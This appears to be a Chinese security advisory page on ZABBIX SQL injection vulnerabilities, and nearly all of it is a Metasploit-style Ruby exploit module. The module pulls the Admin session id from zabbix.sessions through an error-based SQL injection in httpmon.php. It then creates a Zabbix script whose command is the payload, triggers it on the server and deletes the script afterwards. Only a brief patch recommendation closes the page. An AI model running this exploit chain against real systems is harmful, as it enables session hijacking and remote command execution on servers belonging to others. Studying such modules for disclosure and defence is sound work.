ZABBIX API及Frontend多个SQL注入漏洞(CVE(2)

if version and version <= "2.0.8"
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

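def get_session_id
  # Pull an active session id for userid=1 (the built-in Admin account) out of
  # the `zabbix.sessions` table through the error-based SQL injection in the
  # `applications` parameter of httpmon.php.
  #
  # The classic COUNT(*) / FLOOR(RAND(0)*2) GROUP BY trick forces MySQL into a
  # duplicate-key error whose message contains the selected value, framed on
  # both sides by a random alphabetic marker; the marker is what we search for
  # in the response body.
  #
  # NOTE: the schema name (`zabbix`) and the userid (1) are hard-coded, so a
  # non-default database name or a renamed/removed Admin user makes this fail.
  #
  # @return [String] the extracted session id
  # @raise  via fail_with(Failure::Unknown) when no framed value is found
  marker = rand_text_alpha(8)
  # Hex-encode the marker so it can be embedded as a 0x... literal (no quotes).
  marker_hex = marker.unpack('H*').first

  sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{marker_hex},(SELECT MID((IFNULL(CAST" \
         "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 " \
         "LIMIT 0,1),0x#{marker_hex},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"

  res = send_request_cgi(
    'method'   => 'GET',
    'uri'      => normalize_uri(uri.to_s, 'httpmon.php'),
    'vars_get' => { 'applications' => sqli }
  )

  # Non-greedy capture: if the error text is echoed more than once in the page,
  # a greedy `.*` would swallow everything between the first and last marker.
  escaped = Regexp.escape(marker)
  match = res && res.code == 200 && res.body.match(/#{escaped}(?<session>.*?)#{escaped}/)
  session = match && match[:session]

  if session.nil? || session.empty?
    fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session")
  end

  print_status("#{peer} - Extracted session cookie - [ #{session} ]")
  session
end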

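def exploit
  # Full chain: steal the Admin session, create a Zabbix "script" whose command
  # is the payload, then ask the frontend to execute it on a host.
  @session = get_session_id

  # The frontend's CSRF token (`sid`) is derived here as everything from offset
  # 16 of the session id onward -- presumably the last 16 characters of a
  # 32-character session id; confirm against the target version. Guard against
  # a short/odd extraction so we do not send an empty sid and fail obscurely.
  @sid = @session[16..-1].to_s
  if @sid.empty?
    fail_with(Failure::Unknown, "#{peer} - Extracted session id is too short to derive a sid")
  end

  script_name = rand_text_alpha(8)

  # Step 1: create the script (type 0 = script, execute_on 1 = server side).
  print_status("#{peer} - Attempting to inject payload")
  res = send_request_cgi(
    'method'    => 'POST',
    'cookie'    => "zbx_sessionid=#{@session}",
    'uri'       => normalize_uri(uri, 'scripts.php'),
    'vars_post' => {
      'sid'         => @sid,
      'form'        => 'Create+script',
      'name'        => script_name,
      'type'        => '0',
      'execute_on'  => '1',
      'command'     => payload.encoded,
      'commandipmi' => '',
      'description' => '',
      'usrgrpid'    => '0',
      'groupid'     => '0',
      'access'      => '2',
      'save'        => 'Save'
    }
  )

  unless res && res.code == 200 && res.body =~ /Script added/
    fail_with(Failure::Unknown, "#{peer} - Payload injection failed!")
  end
  print_status("#{peer} - Payload injected successfully")

  # Step 2: recover the new scriptid from the listing link that names our
  # script. Escape both interpolated values so they are matched literally, and
  # fail explicitly instead of firing a request with a nil scriptid.
  id_match = res.body.match(/scriptid=(?<id>\d+)&sid=#{Regexp.escape(@sid)}">#{Regexp.escape(script_name)}/)
  unless id_match
    fail_with(Failure::Unknown, "#{peer} - Script was added but its scriptid was not found in the response")
  end
  @scriptid = id_match[:id]

  # Step 3: trigger execution. The response is deliberately not inspected: a
  # blocking payload may never return one.
  print_status("#{peer} - Triggering script #{@scriptid}")
  send_request_cgi(
    'method'   => 'GET',
    'uri'      => normalize_uri(uri.to_s, 'scripts_exec.php'),
    'cookie'   => "zbx_sessionid=#{@session}",
    'vars_get' => {
      'execute'  => '1',
      'scriptid' => @scriptid,
      'sid'      => @sid,
      # Hard-coded host id -- presumably the default "Zabbix server" host entry;
      # not configurable in this module.
      'hostid'   => '10084'
    }
  )
end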

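def cleanup
  # Best-effort removal of the script created in #exploit, so no persistent
  # remote-command entry is left on the target. The framework runs cleanup even
  # when exploit failed part-way, so bail out when there is nothing to delete
  # rather than POST a request with empty sid/scriptid values.
  return unless @session && @sid && @scriptid

  print_status("#{peer} - Cleaning script remnants")
  # Use vars_post so the body is properly URL-encoded (the original hand-built
  # string carried a literal space and brackets).
  res = send_request_cgi(
    'method'    => 'POST',
    'cookie'    => "zbx_sessionid=#{@session}",
    'uri'       => normalize_uri(uri, 'scripts.php'),
    'vars_post' => {
      'sid'                  => @sid,
      'form_refresh'         => '1',
      "scripts[#{@scriptid}]" => @scriptid.to_s,
      'go'                   => 'delete',
      'goButton'             => 'Go (1)'
    }
  )

  if res && res.code == 200 && res.body =~ /Script deleted/
    print_status("#{peer} - Script removed successfully")
  else
    print_warning("#{peer} - Unable to remove script #{@scriptid}")
  end
end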
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

ZABBIX
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载（本文未附下载链接；从上文 check 方法看，2.0.8 及更早版本被判定为存在漏洞，请升级到更高的已修复版本）。
